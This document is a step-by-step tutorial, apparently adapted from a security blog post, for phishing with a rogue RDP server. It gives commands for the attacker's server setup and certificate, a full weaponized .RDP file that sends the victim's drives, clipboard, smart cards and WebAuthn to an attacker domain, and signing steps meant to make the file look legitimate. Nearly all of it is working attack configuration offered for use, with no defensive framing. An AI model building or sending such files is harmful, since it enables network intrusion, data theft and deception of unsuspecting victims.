Шишинг с Rogue RDP. Используем встроенные средства Windows для проникновения в сеть

Rogue RDP – Revisiting Initial Access Methods - Black Hills Information Security

EDR and XDR have significantly improved the level of protection against phishing. Classic document mailings almost don’t work anymore. As an alternative, Rogue RDP as a delivery tool and Living off the Land Binaries for initial access to the customer’s network is good option.

leverage a malicious RDP server, an RDP relay, and a weaponized .RDP connection file which forces unsuspecting victims into connecting and forwarding control over some parts of their machine.

<aside> ⚠️ Requirements

To implement Rogue RDP, you need to create a Windows machine with a white IP address. Then install WSL (Windows Sub System For Linux) and restart the system

• A standard Windows Server
• Enable remote desktop
• Add a new user with RDP permissions </aside>

<aside> ⚠️ using signed RDP file to gain more visual legitimacy

</aside>

Preparation Steps

1. Set up Windows Machine:

   • Create a Windows machine with a public IP address.

   • Install WSL (Windows Subsystem for Linux) for tool setup:

     wsl --install --enable-wsl1
     apt update
     apt install python3 python3-pip git libaugeas0
     pip install certbot
     pipx install pyrdp-mitm
     

2. Obtain and Set Up SSL Certificate:

   • Generate SSL certificate for the rogue domain to add legitimacy:

     certbot certonly --cert-name malrdp -d <your.domain.com> --register-unsafely-without-email
     

   • Convert to PFX format:

     openssl pkcs12 -inkey /etc/letsencrypt/live/malrdp/privkey.pem -in /etc/letsencrypt/live/malrdp/fullchain.pem -export -out malrdp.pfx
     

3. Install Certificate on Windows:

   • Import PFX file into the Windows Certificate Store:
     • Right-click on the PFX file, select Install PFX, and follow prompts.
   • Copy the certificate’s fingerprint (needed for signing the RDP file):

     • Open certmgr.msc > Personal > Certificates > double-click certificate > Details > Thumbprint.

       

RDP File Configuration

1. Create RDP File:

   • Use the following configuration template for the .RDP file:

     screen mode id:i:1
     use multimon:i:0
     desktopwidth:i:1920
     desktopheight:i:1080
     session bpp:i:32
     winposstr:s:0,1,1904,23,3840,1142
     compression:i:1
     keyboardhook:i:2
     audiocapturemode:i:0
     videoplaybackmode:i:1
     connection type:i:7
     networkautodetect:i:1
     bandwidthautodetect:i:1
     displayconnectionbar:i:1
     enableworkspacereconnect:i:0
     disable wallpaper:i:0
     allow font smoothing:i:0
     allow desktop composition:i:0
     disable full window drag:i:1
     disable menu anims:i:1
     disable themes:i:0
     disable cursor setting:i:0
     bitmapcachepersistenable:i:1
     full address:s:<YOUR_DOMAIN_COM>:443
     audiomode:i:0
     redirectprinters:i:1
     redirectcomports:i:0
     redirectsmartcards:i:1
     redirectwebauthn:i:1
     redirectclipboard:i:1
     redirectposdevices:i:0
     autoreconnection enabled:i:1
     authentication level:i:2
     prompt for credentials:i:0
     negotiate security layer:i:1
     remoteapplicationmode:i:0
     alternate shell:s:
     shell working directory:s:
     gatewayhostname:s:
     gatewayusagemethod:i:4
     gatewaycredentialssource:i:4
     gatewayprofileusagemethod:i:0
     promptcredentialonce:i:0
     gatewaybrokeringtype:i:0
     use redirection server name:i:0
     rdgiskdcproxy:i:0
     kdcproxyname:s:
     enablerdsaadauth:i:0
     redirectlocation:i:0
     drivestoredirect:s:*
     

2. Sign RDP File:

   • Use rdpsign.exe to sign the RDP file, making it appear more legitimate:

     rdpsign.exe /sha256 YOUR_CERTIFICATE_THUMBPRINT .\\<filename>.rdp
     
     

3. Check that it is actually signed.